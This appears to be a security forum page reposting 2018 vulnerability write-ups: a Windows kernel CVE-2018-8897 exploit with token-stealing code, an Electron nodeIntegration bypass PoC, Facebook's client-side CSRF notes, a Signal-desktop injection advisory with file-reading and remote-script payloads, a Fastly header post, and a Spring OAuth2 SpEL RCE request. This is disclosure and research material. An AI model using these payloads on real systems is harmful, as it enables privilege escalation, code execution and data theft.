fffff00e`d7a1bc38 fffff8007e4175c0 nt!KiBreakpointTrap fffff00e`d7a1bc40 0000000000000010 fffff00e`d7a1bc48 0000000000000002 fffff00e`d7a1bc50 fffff00ed7a1bc68 fffff00e`d7a1bc58 0000000000000000 fffff00e`d7a1bc60 0000000000000014 fffff00e`d7a1bc68 00007ff7e2261e95 -- fffff00e`d7a1bc70 0000000000000033 fffff00e`d7a1bc78 0000000000000202 fffff00e`d7a1bc80 000000ad39b6f938 */ IsrStackIterator = IsrStackIterator + 0x30; break; } IsrStackIterator -= StackDelta; } PVOID KStub = ( PVOID ) k_ExAllocatePool( 0ull, ( uint64_t )sizeof( IRetToVulnStub ) ); Np_memcpy( KStub, IRetToVulnStub, sizeof( IRetToVulnStub ) ); // ------ KERNEL CODE ------ .... // ------ KERNEL CODE ------ __swapgs(); ( ( ISR_STACK* ) IsrStackIterator )->RIP += 1; ( fnIRetToVulnStub( KStub ) )( Cr4Old, IsrStackIterator, ContextBackup ); } We can’t restore any registers so we will make the thread responsible for the execution of vulnerability store the context in a global container and restore from it instead. Now that we executed our code and returned to user-mode, our exploit is complete! Let’s make a simple demo stealing the System token: uint64_t SystemProcess = *k_PsInitialSystemProcess; uint64_t CurrentProcess = k_PsGetCurrentProcess(); uint64_t CurrentToken = k_PsReferencePrimaryToken( CurrentProcess ); uint64_t SystemToken = k_PsReferencePrimaryToken( SystemProcess ); for ( int i = 0; i < 0x500; i += 0x8 ) { uint64_t Member = *( uint64_t * ) ( CurrentProcess + i ); if ( ( Member & ~0xF ) == CurrentToken ) { *( uint64_t * ) ( CurrentProcess + i ) = SystemToken; break; } } k_PsDereferencePrimaryToken( CurrentToken ); k_PsDereferencePrimaryToken( SystemToken ); Complete implementation of the concept can be found at: https://github.com/can1357/CVE-2018-8897 Credits: @0xNemi and @nickeverdox for finding the vulnerability P.S.: If you want to try this exploit out, you can uninstall the relevant update and give it a try! P.P.S.: Before you ask why I don’t use intrinsics to read/write GSBASE, it is because MSVC generates invalid code: Sursa: https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/
  8. CVE-2018-1000136 - Electron nodeIntegration Bypass May 10, 2018 Posted By Brendan Scarvell Comments (2) A few weeks ago, I came across a vulnerability that affected all current versions of Electron at the time (< 1.7.13, < 1.8.4, and < 2.0.0-beta.3). The vulnerability allowed nodeIntegration to be re-enabled, leading to the potential for remote code execution. If you're unfamiliar with Electron, it is a popular framework that allows you to create cross-platform desktop applications using HTML, CSS, and JavaScript. Some popular applications such as Slack, Discord, Signal, Atom, Visual Studio Code, and Github Desktop are all built using the Electron framework. You can find a list of applications built with Electron here. Electron applications are essentially web apps, which means they're susceptible to cross-site scripting attacks through failure to correctly sanitize user-supplied input. A default Electron application includes access to not only its own APIs, but also includes access to all of Node.js' built in modules. This makes XSS particularly dangerous, as an attacker's payload can allow do some nasty things such as require in the child_process module and execute system commands on the client-side. Atom had an XSS vulnerability not too long ago which did exactly that. You can remove access to Node.js by passing nodeIntegration: false into your application's webPreferences. There's also a WebView tag feature which allows you to embed content, such as web pages, into your Electron application and run it as a separate process. When using a WebView tag you are also able to pass in a number of attributes, including nodeIntegration. WebView containers do not have nodeIntegration enabled by default. The documentation states that if the webviewTag option is not explicitly declared in your webPreferences, it will inherit the same permissions of whatever the value of nodeIntegration is set to. By default, Electron also uses its own custom window.open() function which creates a new instance of a BrowserWindow. The child window will inherit all of the parent window's options (which includes its webPreferences) by default. The custom window.open() function does allow you to override some of the inherited options by passing in a featuresargument: if (!usesNativeWindowOpen) { // Make the browser window or guest view emit "new-window" event. window.open = function (url, frameName, features) { if (url != null && url !== '') { url = resolveURL(url) } const guestId = ipcRenderer.sendSync('ELECTRON_GUEST_WINDOW_MANAGER_WINDOW_OPEN', url, toString(frameName), toString(features)) if (guestId != null) { return getOrCreateProxy(ipcRenderer, guestId) } else { return null } } if (openerId != null) { window.opener = getOrCreateProxy(ipcRenderer, openerId) } } When Electron's custom window.open function is called, it emits an ELECTRON_GUEST_WINDOW_MANAGER_WINDOW_OPENevent. The ELECTRON_GUEST_WINDOW_MANAGER_WINDOW_OPENevent handler then parses the features provided, adding them as options to the newly created window and then emits an ELECTRON_GUEST_WINDOW_MANAGER_INTERNAL_WINDOW_OPENevent. To prevent child windows from being able to do nasty things like re-enabling nodeIntegration when the parent window has it explicitly disabled, guest-window-manager.js contains a hardcoded list of webPreferences options and their restrictive values: // Security options that child windows will always inherit from parent windows const inheritedWebPreferences = new Map([ ['contextIsolation', true], ['javascript', false], ['nativeWindowOpen', true], ['nodeIntegration', false], ['sandbox', true], ['webviewTag', false] ]); The ELECTRON_GUEST_WINDOW_MANAGER_INTERNAL_WINDOW_OPEN event handler then calls the mergeBrowserWindowOptionsfunction which ensures that the restricted attributes of the parent window's webPreferences are applied to the child window: const mergeBrowserWindowOptions = function (embedder, options) { [...] // Inherit certain option values from parent window for (const [name, value] of inheritedWebPreferences) { if (embedder.getWebPreferences()[name] === value) { options.webPreferences[name] = value } } // Sets correct openerId here to give correct options to 'new-window' event handler options.webPreferences.openerId = embedder.id return options } And here is where the vulnerability lays. The mergeBrowserWindowOptions function didn't take into account what the default values of these restricted attributes should be if they were undefined. In other words, if webviewTag: falsewasn't explicitly declared in your application's webPreferences (and was therefore being inferred by explicitly setting nodeIntegration: false), when mergeBrowserWindowOptions went to check the webviewTag, it would then come back undefined thus making the above if statement return false and not apply the parent's webviewTag preference. This allowed window.open to pass the webviewTag option as an additional feature, re-enabling nodeIntegration and allowing the potential for remote code execution. The following proof-of-concept shows how an XSS payload can re-enable nodeIntegration during run time and allow execution of system commands: <script> var x = window.open('data://yoloswag','','webviewTag=yes,show=no'); x.eval( "var webview = new WebView;"+ "webview.setAttribute('webpreferences', 'webSecurity=no, nodeIntegration=yes');"+ "webview.src = `data:text/html;base64,PHNjcmlwdD5yZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygnbHMgLWxhJywgZnVuY3Rpb24gKGUscikgeyBhbGVydChyKTt9KTs8L3NjcmlwdD4=`;"+ "document.body.appendChild(webview)" ); </script> If you find an Electron application with the nodeIntegration option disabled and it contains either an XSS vulnerability through poor sanitization of user input or a vulnerability in another dependency of the application, the above proof-of-concept can allow for remote code execution provided that the application is using a vulnerable version of Electron (version < 1.7.13, < 1.8.4, or < 2.0.0-beta.3) , and hasn't manually opted into one of the following: Declared webviewTag: false in its webPreferences. Enabled the nativeWindowOption option in its webPreferences. Intercepting new-window events and overriding event.newGuest without using the supplied options tag. We'd also like to thank the Electron team for being extremely responsive and for quickly providing a patch to the public. This vulnerability was assigned the CVE identifier CVE-2018-1000136. Sursa: https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2018-1000136---Electron-nodeIntegration-Bypass/
  9. “Client-Side” CSRF Facebook Bug Bounty·Friday, May 11, 2018 At Facebook, the Whitehat program receives hundreds of submissions a month, covering a wide range of vulnerability types. One of the interesting classes of issue which we've seen recently is what we've termed “Client-Side” Cross-Site Request Forgery (CSRF), which we've awarded on average $7.5k. What is CSRF? Before we jump into technical details, let's recap on what CSRF is. This is a class of issue in which an attacker can perform a state changing action, such as posting a status, on behalf of another user. This is made possible due to the fact that browsers (currently, until Same-Site Cookies are supported in all major browsers) send the user's cookies with a request, regardless of the request origin. At Facebook, like other large sites, we have protections in place to mitigate this kind of attack. The most common type of protection is by adding a random token to each state-changing request, and verifying this server-side. An attacker has no way of knowing this value in advance, which means we can ensure any request has explicitly been made by the user. If you're participating in our Whitehat program, then you might see this token being sent - we name it “fb_dtsg”. “Client-Side” CSRF Whilst most researchers think of CSRF as a server-side problem, “Client-Side” CSRF exists in the user's browser or mobile device - a malicious user could perform arbitrary requests to a CSRF-protected end-point, by modifying the end-point to which the client-side code makes an HTTP request to with a valid CSRF token. This could be a form submission, or an XHR call. For example, a product might want to log some analytic data after the page is loaded, which could look the following code: let analytic_uri = window.location.hash.substr(1); (new AsyncRequest(“/ajax” + analytic_uri)) .method(POST) .setBody({csrf_token: csrf_token}) .send() The user would browse to /profile.php#/profile/log. On page load, the JS would make a POST request to “/ajax/profile/log”, and the data saved. However, if an attacker modifies the fragment to “#/updatestatus?status=Hello”, then the JS is instead making a request to update the user's status, with a valid CSRF token. One good trick for hunting for these kind of issues is looking for HTTP requests which are made after the page is rendered - if the end-point being requested is contained in the page's query string or fragment, then it's worth investigating! If you can only control part of the end-point, then it could still be vulnerable, by using tricks like path traversal. Making arbitrary GraphQL requests We had a great submission from one of our top researchers, Philippe Harewood, which used this style of issue to make arbitrary GraphQL on behalf of another user, for which we rewarded him $7,500. On https://business.instagram.com, we had a page which took a business ID from the request, and made a Graph API request to that particular business: POST /[business_id]?fields=... access_token=... Facebook's Graph API is protected against CSRF by requiring a valid access token from the user. Without this token, the request is un-authenticated. Philippe found that since the business ID wasn't validated to be an integer, he could change this to point to our GraphQL end-point (graphql), and make authenticated requests for the user (such as posting a new status), since the JS was making the request with the access token: POST /graphql?q=Mutation...&fields=... access_token=... This is a great example of influencing authenticated requests to point somewhere completely unintended. Conclusion These issues are an interesting and novel take on an older class of bugs, which has prompted us to take a look at ways of detecting and mitigating bugs in JS. If you too enjoy investigating and solving novel bugs, then come join the ProdSec team! Sursa: https://www.facebook.com/notes/facebook-bug-bounty/client-side-csrf/2056804174333798/
  10. signal-desktop HTML tag injection advisory Title: Signal-desktop HTML tag injection Date Published: 2018-05-14 Last Update: 2018-05-14 CVE Name: CVE-2018-10994 Class: Code injection Remotely Exploitable: Yes Locally Exploitable: No Vendors contacted: Signal.org Vulnerability Description: Signal-desktop is the standalone desktop version of the secure Signal messenger. This software is vulnerable to remote code execution from a malicious contact, by sending a specially crafted message containing HTML code that is injected into the chat windows (Cross-site scripting). Vulnerable Packages: Signal-desktop messenger v1.7.1 Signal-desktop messenger v1.8.0 Signal-desktop messenger v1.9.0 Signal-desktop messenger v1.10.0 Originally found in v1.9.0 and v1.10.0, but after reviewing the source code the aforementioned are the impacted versions. Solution/Vendor Information/Workaround Upgrade to Signal-desktop messenger v1.10.1 or v1.11.0-beta.3 For safer communications on desktop systems, please consider the use of a safer end-point client like PGP or GnuPG instead. Credits: This vulnerability was found and researched by Iván Ariel Barrera Oro (@HacKanCuBa), Alfredo Ortega (@ortegaalfredo) and Juliano Rizzo (@julianor), with assistance from Javier Lorenzo Carlos Smaldone (@mis2centavos). Technical Description – Exploit/Concept Code While discussing a XSS vulnerability on a website using the Signal-desktop messenger, it was found that the messenger software also displayed a code-injection vulnerability while parsing the affected URLs. The Signal-desktop software fails to sanitize specific html-encoded HTML tags that can be used to inject HTML code into remote chat windows. Specifically the <img> and <iframe> tags can be used to include remote or local resources. For example, the use of iframes enables full code execution, allowing an attacker to download/upload files, information, etc. The <script> tag was also found injectable. In the Windows operative system, the CSP fails to prevent remote inclusion of resources via the SMB protocol. In this case, remote execution of JavaScript can be achieved by referencing the script in a SMB share as the source of an iframe tag, for example: <iframe src=\\DESKTOP-XXXXX\Temp\test.html>. The included JavaScript code is then executed automatically, without any interaction needed from the user. The vulnerability can be triggered in the signal-desktop client by sending a specially crafted message. Examples: Show an iframe with some text: http://hacktheplanet/?p=%3Ciframe%20srcdoc="<p>PWONED!!</p>"%3E%3C/iframe%3E Display content of user’s own /etc/passwd file: http://hacktheplanet/?p=%3d%3Ciframe%20src=/etc/passwd%3E Include and execute a remote JavaScript file (for Windows clients): http://hacktheplanet/?p=%3d%3Ciframe%20src=\\XXX.XXX.XXX.XXX\Temp\test.html%3E Show a base64-encoded image (bypass “click to download image”): http://hacktheplanet/?p=%3Cimg%20src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQEASABIAAD/2wBDACgcHiMeGSgjISMtKygwPGRBPDc3PHtYXUlkkYCZlo+AjIqgtObDoKrarYqMyP/L2u71////m8H////6/+b9//j/wAALCAAtADwBAREA/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/9oACAEBAAA/AMapRbv5YckKD0z1pPJbjJAzSGIgjcQMnFEkZSTZkE+1STWksTKrAZbpThYzfLuAUN3JFJ9kkyeV4PrTBFyNzCpSGuZiRgY4ArRgtAvzSfMfSqN3EYpjsA2noTg1B87HlqNrnqxP40nlt6ml8pvWo/MY/wARqzAzcEVorK24RuAAw4IqLUo2EKFFJIOM9azN8oOMkfhTz9oVdxDhfWlR3ZOWJ/Gpdzep/OqVTQEq2MVpo4aNWABKHnNLIzNHGW7OST6DFZ92wEoAGAvX3qNrl/KaEH5CePaliPyYqVTwKrIu41O1u0Z4BP06irUDKiky5DYx04p8sxddpwFA6etZcrFnJPepLa2NwSFPIoQbQVPUHFTLjFUskd6d5j/3m/Ok3sf4j+dG9j/EfzpKVXZPusR9DSZPrS7j6mv/2Q=="%3e Timeline: 2018-05-10 18:45 GMT-3: vuln discovered 2018-05-11 13:03 GMT-3: emailed Signal security team 2018-05-11 15:02 GMT-3: reply from Signal: vuln confirmed & patch ongoing 2018-05-11 16:12 GMT-3: patch committed 2018-05-11 18:00 GMT-3: signal-desktop update published 2018-05-14 18:00 GMT-3: public disclosure References: Patch: https://github.com/signalapp/Signal-Desktop/compare/v1.11.0-beta.2…v1.11.0-beta.3 Writeup: https://ivan.barreraoro.com.ar/signal-desktop-html-tag-injection/ Sursa: https://ivan.barreraoro.com.ar/signal-desktop-html-tag-injection/advisory/
      • 1
      • Thanks
  11. The headers we don't want By Andrew Betts | May 10, 2018 If you want to learn more about headers, don’t miss Andrew’s talk at Altitude London on May 22. HTTP headers are an important way of controlling how caches and browsers process your web content. But many are used incorrectly or pointlessly, which adds overhead at a critical time in the loading of your page, and may not work as you intended. In this first of a series of posts about header best practice, we’ll look at unnecessary headers. Most developers know about and depend on a variety of HTTP headers to make their content work. Those that are best known include Content-Type and Content-Length, which are both almost universal. But more recently, headers such as Content-Security-Policy and Strict-Transport-Security have started to improve security, and Link rel=preload headers to improve performance. Few sites use these, despite their wide support across browsers. At the same time, there are lots of headers that are hugely popular but aren’t new and aren’t actually all that useful. We can prove this using HTTP Archive, a project run by Google and sponsored by Fastly that loads 500,000 websites every month using WebPageTest, and makes the results available in BigQuery. From the HTTP Archive data, here are the 30 most popular response headers (based on the number of domains in the archive which are serving each header), and roughly how useful each one is: Header name Requests Domains Status date 48779277 535621 Required by protocol content-type 47185627 533636 Usually required by browser server 43057807 519663 Unnecessary content-length 42388435 519118 Useful last-modified 34424562 480294 Useful cache-control 36490878 412943 Useful etag 23620444 412370 Useful content-encoding 16194121 409159 Required for compressed content expires 29869228 360311 Unnecessary x-powered-by 4883204 211409 Unnecessary pragma 7641647 188784 Unnecessary x-frame-options 3670032 105846 Unnecessary access-control-allow-origin 11335681 103596 Useful x-content-type-options 11071560 94590 Useful link 1212329 87475 Useful age 7401415 59242 Useful x-cache 5275343 56889 Unnecessary x-xss-protection 9773906 51810 Useful strict-transport-security 4259121 51283 Useful via 4020117 47102 Unnecessary p3p 8282840 44308 Unnecessary expect-ct 2685280 40465 Useful content-language 334081 37927 Debatable x-aspnet-version 676128 33473 Unnecessary access-control-allow-credentials 2804382 30346 Useful x-robots-tag 179177 24911 Not relevant to browsers x-ua-compatible 489056 24811 Unnecessary access-control-allow-methods 1626129 20791 Useful access-control-allow-headers 1205735 19120 Useful Let’s look at the unnecessary headers and see why we don’t need them, and what we can do about it. Vanity (server, x-powered-by, via) You may be very proud of your choice of server software, but most people couldn’t care less. At worst, these headers might be divulging sensitive data that makes your site easier to attack. Server: apache X-Powered-By: PHP/5.1.1 Via: 1.1 varnish, 1.1 squid RFC7231 allows for servers to include a Server header in the response, identifying the software used to serve the content. This is most commonly a string like “apache” or “nginx”. While it’s allowed, it’s not mandatory, and offers very little value to either developers or end users. Nevertheless, this is the third most popular HTTP response header on the web today. X-Powered-By is the most popular header in our list that is not defined in any standard, and has a similar purpose, though normally refers to the application platform that sits behind the web server. Common values include “ASP.net”, “PHP” and “Express”. Again this isn’t providing any tangible benefit and is taking up space. More debatable perhaps is Via, which is required (by RFC7230) to be added to the request by any proxy through which it passes to identify the proxy. This can be the proxy’s hostname, but is more likely to be a generic identifier like “vegur”, “varnish”, or “squid”. Removing (or not setting) this header on a request can cause proxy forwarding loops. However, interestingly it is also copied into the response on the way back to the browser, and here it’s just informational and no browsers do anything with it, so it’s reasonably safe to get rid of it if you want to. Deprecated standards (P3P, Expires, X-Frame-Options, X-UA-Compatible) Another category of headers is those that do have an effect in the browser but are not (or are no longer) the best way of achieving that effect. P3P: cp="this is not a p3p policy" Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Frame-Options: SAMEORIGIN X-UA-Compatible: IE=edge P3P is a curious animal. I had no idea what this was, and even more curiously, one of the most common values is “this is not a p3p policy”. Well, is it, or isn’t it? The story here goes back to an attempt to standardise a machine readable privacy policy. There was disagreement on how to surface the data in browsers, and only one browser ever implemented the header - Internet Explorer. Even in IE though, P3P didn’t trigger any visual effect to the user; it just needs to be present to permit access to third party cookies in iframes. Some sites even set a non-conforming P3P policy like the one above – even though doing so is on shaky legal ground. Needless to say, reading third party cookies is generally a bad idea, so if you don’t do it, then you won’t need to set a P3P header! Expires is almost unbelievably popular, considering that Cache-Control has been preferred over Expires for 20 years. Where a Cache-Control header includes a max-age directive, any Expires header on the same response will be ignored. But there are a massive number of sites setting both, and the Expires header is most commonly set to Thu, 01 Dec 1994 16:00:00 GMT, because you want your content to not be cached and copy-pasting the example date from the spec is certainly one way of doing that. But there is simply no reason to do this. If you have an Expires header with a date in the past, replace it with: Cache-Control: no-store, private (no-store is a very strong directive not to write the content to persistent storage, so depending on your use case you might actually prefer no-cache for better performance, for example when using back/forward navigation or resuming hibernated tabs) Some of the tools that audit your site will tell you to add an X-Frame-Options header with a value of ‘SAMEORIGIN’. This tells browsers that you are refusing to be framed by another site, and is generally a good defense against clickjacking. However, the same effect can be achieved, with more consistent support and more robust definition of behaviour, by doing: Content-Security-Policy: frame-ancestors 'self' This has the additional benefit of being part of a header (CSP) which you should have anyway for other reasons (more on that later). So you can probably do without X-Frame-Options these days. Finally, back in their IE9 days, Microsoft introduced ‘compatibility view’, and would potentially render a page using the IE8 or IE7 engine, even when the user was browsing with IE9, if the browser thought that the page might require the earlier version to work properly. Those heuristics were not always correct, and developers were able to override them by using an X-UA-Compatible header or meta tag. In fact, this increasingly became a standard part of frameworks like Bootstrap. These days, this header achieves very little - very few people are using browsers that would understand it, and if you are actively maintaining your site it’s very unlikely that you are using technologies that would trigger compatibility view. Debug data (X-ASPNet-Version, X-Cache) It’s kind of astonishing that some of the most popular headers in common use are not in any standard. Essentially this means that somehow, thousands of websites seem to have spontaneously agreed to use a particular header in a particular way. X-Cache: HIT X-Request-ID: 45a336c7-1bd5-4a06-9647-c5aab6d5facf X-ASPNet-Version: 3.2.32 X-AMZN-RequestID: 0d6e39e2-4ecb-11e8-9c2d-fa7ae01bbebc In reality, these ‘unknown’ headers are not separately and independently minted by website developers. They are typically artefacts of using particular server frameworks, software or specific vendors’ services (in this example set, the last header is a common AWS header). X-Cache, in particular, is actually added by Fastly (other CDNs also do this), along with other Fastly-related headers like X-Cache-Hits and X-Served-By. When debugging is enabled, we add even more, such as Fastly-Debug-Path and Fastly-Debug-TTL. These headers are not recognised by any browser, and removing them makes no difference to how your pages are rendered. However, since these headers might provide you, the developer, with useful information, you might like to keep a way to turning them on. Misunderstandings (Pragma) I didn’t expect to be in 2018 writing a post about the Pragma header, but according to our HTTP Archive data it’s still the 11th most popular. Not only was Pragma deprecated as long ago as 1997, but it was never intended to be a response header anyway - as specified, it only has meaning as part of a request. Pragma: no-cache Nevertheless it’s use as a response header is so widespread that some browsers recognise it in this context as well. Today the probability that your response will transit a cache that understands Pragma in a response context, and doesn’t understand Cache-Control, is vanishingly small. If you want to make sure that something isn’t cached, Cache-Control: no-store, private is all you need. Non-Browser (X-Robots-Tag) One header in our top 30 is a non-browser header. X-Robots-Tag is intended to be consumed by a crawler, such as Google or Bing’s bots. Since it has no meaning to a browser, you could choose to only set it when the requesting user-agent is a crawler. Equally, you might decide that this makes testing harder, or perhaps that it violates the terms of service of the search engine. Bugs Finally, it’s worth finishing on an honourable mention for simple bugs. In a request, a Host header makes sense, but seeing it on a response probably means your server is misconfigured somehow (I’d love to know how, exactly). Nevertheless, 68 domains in HTTP archive are returning a Host header in their responses. Removing headers at the edge Fortunately, if your site is behind Fastly, removing headers is pretty easy using VCL. It makes sense that you might want to keep the genuinely useful debug data available to your dev team, but hide it for public users, so that’s easily done by detecting a cookie or inbound HTTP header: unset resp.http.Server; unset resp.http.X-Powered-By; unset resp.http.X-Generator; if (!req.http.Cookie:debug && !req.http.Debug) { unset resp.http.X-Amzn-RequestID; unset resp.http.X-Cache; } In the next post in this series, I’ll be talking about best practices for headers that you should be setting, and how to enable them at the edge Author Andrew Betts |Web Developer and Principal Developer Advocate Sursa: https://www.fastly.com/blog/headers-we-dont-want
  12. Beware of the Magic SpEL(L) – Part 2 (CVE-2018-1260) Written by Philippe Arteau On Tuesday, we released the details of RCE vulnerability affecting Spring Data (CVE-2018-1273). We are now repeating the same exercise for a similar RCE vulnerability in Spring Security OAuth2 (CVE-2018-1260). We are going to present the attack vector, its discovery method and the conditions required for exploitation. This vulnerability also has similarities with another vulnerability disclosed in 2016. The resemblance will be discussed in the section where we review the fix. Analyzing a potential vulnerability It all started by the report of the bug pattern SPEL_INJECTION by Find Security Bugs. It reported the use of SpelExpressionParser.parseExpression() with a dynamic parameter, the same API used in the previous vulnerability we had found. The expression parser is used to parse expressions placed between curly brackets “${…}”. public SpelView(String template) { this.template = template; this.prefix = new RandomValueStringGenerator().generate() + "{"; this.context.addPropertyAccessor(new MapAccessor()); this.resolver = new PlaceholderResolver() { public String resolvePlaceholder(String name) { Expression expression = parser.parseExpression(name); //Expression parser Object value = expression.getValue(context); return value == null ? null : value.toString(); } }; } 1 2 3 4 5 6 7 8 9 10 11 12 public SpelView(String template) { this.template = template; this.prefix = new RandomValueStringGenerator().generate() + "{"; this.context.addPropertyAccessor(new MapAccessor()); this.resolver = new PlaceholderResolver() { public String resolvePlaceholder(String name) { Expression expression = parser.parseExpression(name); //Expression parser Object value = expression.getValue(context); return value == null ? null : value.toString(); } }; } The controller class WhitelabelApprovalEndpoint uses this SpelView class to build the approval page for OAuth2 authorization flow. The SpelView class evaluates the string named “template” – see code below – as a Spring Expression. @RequestMapping("/oauth/confirm_access") public ModelAndView getAccessConfirmation(Map&lt;String, Object&gt; model, HttpServletRequest request) throws Exception { String template = createTemplate(model, request); if (request.getAttribute("_csrf") != null) { model.put("_csrf", request.getAttribute("_csrf")); } return new ModelAndView(new SpelView(template), model); //template variable is a SpEL } 1 2 3 4 5 6 7 8 @RequestMapping("/oauth/confirm_access") public ModelAndView getAccessConfirmation(Map&lt;String, Object&gt; model, HttpServletRequest request) throws Exception { String template = createTemplate(model, request); if (request.getAttribute("_csrf") != null) { model.put("_csrf", request.getAttribute("_csrf")); } return new ModelAndView(new SpelView(template), model); //template variable is a SpEL } Following the methods createTemplate() and createScopes(), we can see that the attribute “scopes” is appended to the HTML template which will be evaluated as an expression. The only model parameter bound to the template is a CSRF token. However, the CSRF token will not be under the control of a remote user. protected String createTemplate(Map<String, Object> model, HttpServletRequest request) { String template = TEMPLATE; if (model.containsKey("scopes") || request.getAttribute("scopes") != null) { template = template.replace("%scopes%", createScopes(model, request)).replace("%denial%", ""); } [...] private CharSequence createScopes(Map<String, Object> model, HttpServletRequest request) { StringBuilder builder = new StringBuilder("<ul>"); @SuppressWarnings("unchecked") Map<String, String> scopes = (Map<String, String>) (model.containsKey("scopes") ? model.get("scopes") : request .getAttribute("scopes")); //Scope attribute loaded here for (String scope : scopes.keySet()) { String approved = "true".equals(scopes.get(scope)) ? " checked" : ""; String denied = !"true".equals(scopes.get(scope)) ? " checked" : ""; String value = SCOPE.replace("%scope%", scope).replace("%key%", scope).replace("%approved%", approved) .replace("%denied%", denied); builder.append(value); } builder.append("</ul>"); return builder.toString(); } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 protected String createTemplate(Map<String, Object> model, HttpServletRequest request) { String template = TEMPLATE; if (model.containsKey("scopes") || request.getAttribute("scopes") != null) { template = template.replace("%scopes%", createScopes(model, request)).replace("%denial%", ""); } [...] private CharSequence createScopes(Map<String, Object> model, HttpServletRequest request) { StringBuilder builder = new StringBuilder("<ul>"); @SuppressWarnings("unchecked") Map<String, String> scopes = (Map<String, String>) (model.containsKey("scopes") ? model.get("scopes") : request .getAttribute("scopes")); //Scope attribute loaded here for (String scope : scopes.keySet()) { String approved = "true".equals(scopes.get(scope)) ? " checked" : ""; String denied = !"true".equals(scopes.get(scope)) ? " checked" : ""; String value = SCOPE.replace("%scope%", scope).replace("%key%", scope).replace("%approved%", approved) .replace("%denied%", denied); builder.append(value); } builder.append("</ul>"); return builder.toString(); } At this point, we are unsure if the scopes attribute can be controlled by the remote user. While attribute (req.getAttribute(..)) represents session values stored server-side, scope is an optional parameter part of OAuth2 flow. The parameter might be accessible to the user, saved to the server-side attributes and finally loaded into the previous template. After some research in the documentation and some manual tests, we found that “scope” is a GET parameter part of the implicit OAuth2 flow. Therefore, the implicit mode would be required for our vulnerable application. Proof-of-Concept and Limitations When testing our application, we realized that the scopes were validated against a scopes whitelist defined by the user/client. If this whitelist is configured, we can’t be creative with the parameter scope. If the scopes are simply not defined, no validation is applied to the name of the scopes. This limitation will likely make most Spring OAuth2 applications safe. This first request made used the scope “${1338-1}”, see picture below. Based on the response, we now have a confirmation that the scope parameter’s value can reach the SpelView expression evaluation. We can see in the resulting HTML multiples instances of the string “scope.1337”. Pushing the probe value ${1338-1} A second test was made using the expression “${T(java.lang.Runtime).getRuntime().exec(“calc.exe”)}” to verify that the expressions are not limited to simple arithmetic operations. Simple proof-of-concept request spawning a calc.exe subprocess For easier reproduction, here is the raw HTTP request from the previous screenshot. Some characters – mainly curly brackets – were not supported by the web container and needed to be URL encoded in order to reach the application. { -> %7b POST /oauth/authorize?response_type=code&client_id=client&username=user&password=user&grant_type=password&scope=%24%7bT(java.lang.Runtime).getRuntime().exec(%22calc.exe%22)%7d&redirect_uri=http://csrf.me HTTP/1.1 Host: localhost:8080 Authorization: Bearer 1f5e6d97-7448-4d8d-bb6f-4315706a4e38 Content-Type: application/x-www-form-urlencoded Accept: */* Content-Length: 0 1 2 3 4 5 6 POST /oauth/authorize?response_type=code&client_id=client&username=user&password=user&grant_type=password&scope=%24%7bT(java.lang.Runtime).getRuntime().exec(%22calc.exe%22)%7d&redirect_uri=http://csrf.me HTTP/1.1 Host: localhost:8080 Authorization: Bearer 1f5e6d97-7448-4d8d-bb6f-4315706a4e38 Content-Type: application/x-www-form-urlencoded Accept: */* Content-Length: 0 Reviewing The Fix The solution chosen by the Pivotal team was to replace SpelView with a simpler view, with basic concatenation. This eliminates all possible paths to a SpEL evaluation. The first patch proposed introduced a potential XSS vulnerability, but luckily this was spotted before any release was made. The scope values are now properly escaped and free from any injection. More importantly, this solution improved the security of another endpoint: WhitelabelErrorEndpoint. The endpoint is also no longer uses a Spel View. It was found vulnerable to an identical attack vector in 2016. Spring-OAuth2 also used the SpelView class to build the error page. The interesting twist is that the template parameter was static, but the parameters bound to the template were evaluated recursively. This means that any value in the model could lead to a Remote Code Execution. Example with normal values Example with an expression included in the model This recursive evaluation was fixed by adding a random prefix to the expression boundary. The security of this template now relies on the randomness of 6 characters (62 possibilities to the power of 6). Some analysts were skeptical regarding this fix and raised the risk of a race condition if enough attempts are made. However, this is no longer a possibility since SpelView was also removed from this endpoint. The SpelView class is also present in Spring Boot. This implementation has a custom resolver to avoid recursion. This means that while the Spring-OAuth2 project no longer uses it, some other components, or proprietary applications, might have reused (copy-pasted) this utility class to save some time. For this reason, a new detector looking for SpelView was introduced in Find Security Bugs. The detector does not look for a specific package name because we assume that the application will likely have a copy of the SpelView class rather than a reference to Spring-OAuth2 or Spring Boot classes. Limitation & exploitability We encourage you to keep all your web applications’ dependencies up-to-date. If for any reason you must delay the last month’s updates, here are the specific conditions for exploitation: Spring OAuth2 in your dependency tree The users must have implicit flow enabled; it can be enabled along with other grant types The scope list needs to be empty (not explicitly set to one or more elements) The good news is that not all OAuth2 applications will be vulnerable. In order to specify arbitrary scopes, the user profile of the attacker needs to have an empty list of scopes. Conclusion This was the second and last article of the series on SpEL injection vulnerabilities. We hope it brought some light on this less frequent vulnerability class. As mentioned previously in Part 1, finding this vulnerability class in your own application is unlikely. It is more likely to come up in components similar to Spring-Data or Spring-OAuth. If you are a Java developer or tasked with reviewing Java code for security, you could scan your application using Find Security Bugs, the tool we used to find this vulnerability. This type of vulnerability hunting can be daunting because many code patterns cause indirection, making variable tracking harder. Kudos to Alvaros Muñoz, pyn3rd and Gal Goldshtein who reproduced the vulnerability and documented the flaw a few days after the official announcement made by Pivotal. Reference https://pivotal.io/security/cve-2018-1260: Official vulnerability announcement by Pivotal https://pivotal.io/security/cve-2016-4977: Similar vulnerability affecting Spring-OAuth2 https://docs.spring.io/spring/docs/3.0.x/reference/expressions.html: Spring Expression language capabilities http://find-sec-bugs.github.io/bugs.htm#SPEL_INJECTION: Bug description from Find Security Bugs Sursa: 